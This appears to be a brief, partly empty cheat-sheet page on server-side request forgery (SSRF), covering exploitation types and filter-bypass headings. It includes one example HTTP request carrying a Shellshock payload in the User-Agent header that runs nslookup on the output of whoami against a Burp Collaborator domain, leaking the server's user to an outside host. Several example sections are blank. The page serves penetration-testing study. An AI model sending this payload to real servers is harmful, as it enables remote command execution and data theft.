SSRF
The website server make HTTP requests to the attacker domain.
Exploiting
SSRF against the server itself
SSRF against other back-end systems
Blind SSRF vulnerabilities
Find vulnerability:
Example (Blind SSRF with Shellshock exploitation):
GET /path TTP/1.1
Host: test.net
...
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).aaabbbcccdddeeefff.burpcollaborator.net
...
Referer: http://192.168.0.1:8080
Upgrade-Insecure-Requests: 1
Connection: closeBypass
Bypass blacklist-based
Change "127.0.0.1" to:
Example:
Bypass whitelist-based
Bypassing SSRF filters via open redirection
Last updated
